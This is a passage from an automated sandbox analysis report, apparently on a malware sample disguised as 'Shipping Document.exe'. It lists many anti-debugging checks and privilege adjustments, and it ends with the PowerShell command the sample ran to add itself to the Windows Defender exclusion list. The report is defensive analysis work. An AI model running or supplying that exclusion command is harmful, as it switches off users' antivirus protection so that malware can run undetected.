                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01100750 mov eax, dword ptr fs:[00000030h]10_2_01100750
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142750 mov eax, dword ptr fs:[00000030h]10_2_01142750
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142750 mov eax, dword ptr fs:[00000030h]10_2_01142750
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118E75D mov eax, dword ptr fs:[00000030h]10_2_0118E75D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01184755 mov eax, dword ptr fs:[00000030h]10_2_01184755
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113674D mov esi, dword ptr fs:[00000030h]10_2_0113674D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113674D mov eax, dword ptr fs:[00000030h]10_2_0113674D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113674D mov eax, dword ptr fs:[00000030h]10_2_0113674D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01108770 mov eax, dword ptr fs:[00000030h]10_2_01108770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110770 mov eax, dword ptr fs:[00000030h]10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A678E mov eax, dword ptr fs:[00000030h]10_2_011A678E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B47A0 mov eax, dword ptr fs:[00000030h]10_2_011B47A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011007AF mov eax, dword ptr fs:[00000030h]10_2_011007AF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110C7C0 mov eax, dword ptr fs:[00000030h]10_2_0110C7C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011807C3 mov eax, dword ptr fs:[00000030h]10_2_011807C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011047FB mov eax, dword ptr fs:[00000030h]10_2_011047FB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011047FB mov eax, dword ptr fs:[00000030h]10_2_011047FB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118E7E1 mov eax, dword ptr fs:[00000030h]10_2_0118E7E1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011227ED mov eax, dword ptr fs:[00000030h]10_2_011227ED
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011227ED mov eax, dword ptr fs:[00000030h]10_2_011227ED
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011227ED mov eax, dword ptr fs:[00000030h]10_2_011227ED
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01142619 mov eax, dword ptr fs:[00000030h]10_2_01142619
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111260B mov eax, dword ptr fs:[00000030h]10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111260B mov eax, dword ptr fs:[00000030h]10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111260B mov eax, dword ptr fs:[00000030h]10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111260B mov eax, dword ptr fs:[00000030h]10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111260B mov eax, dword ptr fs:[00000030h]10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111260B mov eax, dword ptr fs:[00000030h]10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111260B mov eax, dword ptr fs:[00000030h]10_2_0111260B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E609 mov eax, dword ptr fs:[00000030h]10_2_0117E609
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01136620 mov eax, dword ptr fs:[00000030h]10_2_01136620
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01138620 mov eax, dword ptr fs:[00000030h]10_2_01138620
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E627 mov eax, dword ptr fs:[00000030h]10_2_0111E627
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110262C mov eax, dword ptr fs:[00000030h]10_2_0110262C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111C640 mov eax, dword ptr fs:[00000030h]10_2_0111C640
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01132674 mov eax, dword ptr fs:[00000030h]10_2_01132674
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C866E mov eax, dword ptr fs:[00000030h]10_2_011C866E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C866E mov eax, dword ptr fs:[00000030h]10_2_011C866E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A660 mov eax, dword ptr fs:[00000030h]10_2_0113A660
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A660 mov eax, dword ptr fs:[00000030h]10_2_0113A660
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104690 mov eax, dword ptr fs:[00000030h]10_2_01104690
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104690 mov eax, dword ptr fs:[00000030h]10_2_01104690
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011366B0 mov eax, dword ptr fs:[00000030h]10_2_011366B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113C6A6 mov eax, dword ptr fs:[00000030h]10_2_0113C6A6
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A6C7 mov ebx, dword ptr fs:[00000030h]10_2_0113A6C7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A6C7 mov eax, dword ptr fs:[00000030h]10_2_0113A6C7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E6F2 mov eax, dword ptr fs:[00000030h]10_2_0117E6F2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E6F2 mov eax, dword ptr fs:[00000030h]10_2_0117E6F2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E6F2 mov eax, dword ptr fs:[00000030h]10_2_0117E6F2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E6F2 mov eax, dword ptr fs:[00000030h]10_2_0117E6F2
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011806F1 mov eax, dword ptr fs:[00000030h]10_2_011806F1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011806F1 mov eax, dword ptr fs:[00000030h]10_2_011806F1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118C912 mov eax, dword ptr fs:[00000030h]10_2_0118C912
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F8918 mov eax, dword ptr fs:[00000030h]10_2_010F8918
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F8918 mov eax, dword ptr fs:[00000030h]10_2_010F8918
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E908 mov eax, dword ptr fs:[00000030h]10_2_0117E908
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117E908 mov eax, dword ptr fs:[00000030h]10_2_0117E908
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118892A mov eax, dword ptr fs:[00000030h]10_2_0118892A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0119892B mov eax, dword ptr fs:[00000030h]10_2_0119892B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4940 mov eax, dword ptr fs:[00000030h]10_2_011D4940
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01180946 mov eax, dword ptr fs:[00000030h]10_2_01180946
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A4978 mov eax, dword ptr fs:[00000030h]10_2_011A4978
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A4978 mov eax, dword ptr fs:[00000030h]10_2_011A4978
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118C97C mov eax, dword ptr fs:[00000030h]10_2_0118C97C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01126962 mov eax, dword ptr fs:[00000030h]10_2_01126962
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01126962 mov eax, dword ptr fs:[00000030h]10_2_01126962
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01126962 mov eax, dword ptr fs:[00000030h]10_2_01126962
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0114096E mov eax, dword ptr fs:[00000030h]10_2_0114096E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0114096E mov edx, dword ptr fs:[00000030h]10_2_0114096E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0114096E mov eax, dword ptr fs:[00000030h]10_2_0114096E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011889B3 mov esi, dword ptr fs:[00000030h]10_2_011889B3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011889B3 mov eax, dword ptr fs:[00000030h]10_2_011889B3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011889B3 mov eax, dword ptr fs:[00000030h]10_2_011889B3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011129A0 mov eax, dword ptr fs:[00000030h]10_2_011129A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011009AD mov eax, dword ptr fs:[00000030h]10_2_011009AD
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011009AD mov eax, dword ptr fs:[00000030h]10_2_011009AD
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h]10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h]10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h]10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h]10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h]10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A9D0 mov eax, dword ptr fs:[00000030h]10_2_0110A9D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011349D0 mov eax, dword ptr fs:[00000030h]10_2_011349D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CA9D3 mov eax, dword ptr fs:[00000030h]10_2_011CA9D3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011969C0 mov eax, dword ptr fs:[00000030h]10_2_011969C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011329F9 mov eax, dword ptr fs:[00000030h]10_2_011329F9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011329F9 mov eax, dword ptr fs:[00000030h]10_2_011329F9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118E9E0 mov eax, dword ptr fs:[00000030h]10_2_0118E9E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118C810 mov eax, dword ptr fs:[00000030h]10_2_0118C810
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A483A mov eax, dword ptr fs:[00000030h]10_2_011A483A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A483A mov eax, dword ptr fs:[00000030h]10_2_011A483A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A830 mov eax, dword ptr fs:[00000030h]10_2_0113A830
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01122835 mov eax, dword ptr fs:[00000030h]10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01122835 mov eax, dword ptr fs:[00000030h]10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01122835 mov eax, dword ptr fs:[00000030h]10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01122835 mov ecx, dword ptr fs:[00000030h]10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01122835 mov eax, dword ptr fs:[00000030h]10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01122835 mov eax, dword ptr fs:[00000030h]10_2_01122835
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01130854 mov eax, dword ptr fs:[00000030h]10_2_01130854
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104859 mov eax, dword ptr fs:[00000030h]10_2_01104859
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104859 mov eax, dword ptr fs:[00000030h]10_2_01104859
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01112840 mov ecx, dword ptr fs:[00000030h]10_2_01112840
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01196870 mov eax, dword ptr fs:[00000030h]10_2_01196870
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01196870 mov eax, dword ptr fs:[00000030h]10_2_01196870
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118E872 mov eax, dword ptr fs:[00000030h]10_2_0118E872
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118E872 mov eax, dword ptr fs:[00000030h]10_2_0118E872
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118C89D mov eax, dword ptr fs:[00000030h]10_2_0118C89D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01100887 mov eax, dword ptr fs:[00000030h]10_2_01100887
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E8C0 mov eax, dword ptr fs:[00000030h]10_2_0112E8C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D08C0 mov eax, dword ptr fs:[00000030h]10_2_011D08C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113C8F9 mov eax, dword ptr fs:[00000030h]10_2_0113C8F9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113C8F9 mov eax, dword ptr fs:[00000030h]10_2_0113C8F9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CA8E4 mov eax, dword ptr fs:[00000030h]10_2_011CA8E4
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h]10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h]10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h]10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h]10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h]10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h]10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h]10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h]10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117EB1D mov eax, dword ptr fs:[00000030h]10_2_0117EB1D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4B00 mov eax, dword ptr fs:[00000030h]10_2_011D4B00
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112EB20 mov eax, dword ptr fs:[00000030h]10_2_0112EB20
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112EB20 mov eax, dword ptr fs:[00000030h]10_2_0112EB20
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C8B28 mov eax, dword ptr fs:[00000030h]10_2_011C8B28
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011C8B28 mov eax, dword ptr fs:[00000030h]10_2_011C8B28
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AEB50 mov eax, dword ptr fs:[00000030h]10_2_011AEB50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D2B57 mov eax, dword ptr fs:[00000030h]10_2_011D2B57
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D2B57 mov eax, dword ptr fs:[00000030h]10_2_011D2B57
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D2B57 mov eax, dword ptr fs:[00000030h]10_2_011D2B57
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D2B57 mov eax, dword ptr fs:[00000030h]10_2_011D2B57
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B4B4B mov eax, dword ptr fs:[00000030h]10_2_011B4B4B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B4B4B mov eax, dword ptr fs:[00000030h]10_2_011B4B4B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A8B42 mov eax, dword ptr fs:[00000030h]10_2_011A8B42
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01196B40 mov eax, dword ptr fs:[00000030h]10_2_01196B40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01196B40 mov eax, dword ptr fs:[00000030h]10_2_01196B40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CAB40 mov eax, dword ptr fs:[00000030h]10_2_011CAB40
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F8B50 mov eax, dword ptr fs:[00000030h]10_2_010F8B50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FCB7E mov eax, dword ptr fs:[00000030h]10_2_010FCB7E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B4BB0 mov eax, dword ptr fs:[00000030h]10_2_011B4BB0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B4BB0 mov eax, dword ptr fs:[00000030h]10_2_011B4BB0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110BBE mov eax, dword ptr fs:[00000030h]10_2_01110BBE
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110BBE mov eax, dword ptr fs:[00000030h]10_2_01110BBE
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AEBD0 mov eax, dword ptr fs:[00000030h]10_2_011AEBD0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01120BCB mov eax, dword ptr fs:[00000030h]10_2_01120BCB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01120BCB mov eax, dword ptr fs:[00000030h]10_2_01120BCB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01120BCB mov eax, dword ptr fs:[00000030h]10_2_01120BCB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01100BCD mov eax, dword ptr fs:[00000030h]10_2_01100BCD
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01100BCD mov eax, dword ptr fs:[00000030h]10_2_01100BCD
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01100BCD mov eax, dword ptr fs:[00000030h]10_2_01100BCD
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01108BF0 mov eax, dword ptr fs:[00000030h]10_2_01108BF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01108BF0 mov eax, dword ptr fs:[00000030h]10_2_01108BF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01108BF0 mov eax, dword ptr fs:[00000030h]10_2_01108BF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118CBF0 mov eax, dword ptr fs:[00000030h]10_2_0118CBF0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112EBFC mov eax, dword ptr fs:[00000030h]10_2_0112EBFC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118CA11 mov eax, dword ptr fs:[00000030h]10_2_0118CA11
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01124A35 mov eax, dword ptr fs:[00000030h]10_2_01124A35
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01124A35 mov eax, dword ptr fs:[00000030h]10_2_01124A35
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113CA38 mov eax, dword ptr fs:[00000030h]10_2_0113CA38
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113CA24 mov eax, dword ptr fs:[00000030h]10_2_0113CA24
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112EA2E mov eax, dword ptr fs:[00000030h]10_2_0112EA2E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h]10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h]10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h]10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h]10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h]10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h]10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106A50 mov eax, dword ptr fs:[00000030h]10_2_01106A50
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110A5B mov eax, dword ptr fs:[00000030h]10_2_01110A5B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110A5B mov eax, dword ptr fs:[00000030h]10_2_01110A5B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117CA72 mov eax, dword ptr fs:[00000030h]10_2_0117CA72
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117CA72 mov eax, dword ptr fs:[00000030h]10_2_0117CA72
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AEA60 mov eax, dword ptr fs:[00000030h]10_2_011AEA60
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113CA6F mov eax, dword ptr fs:[00000030h]10_2_0113CA6F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113CA6F mov eax, dword ptr fs:[00000030h]10_2_0113CA6F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113CA6F mov eax, dword ptr fs:[00000030h]10_2_0113CA6F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01138A90 mov edx, dword ptr fs:[00000030h]10_2_01138A90
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110EA80 mov eax, dword ptr fs:[00000030h]10_2_0110EA80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4A80 mov eax, dword ptr fs:[00000030h]10_2_011D4A80
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"
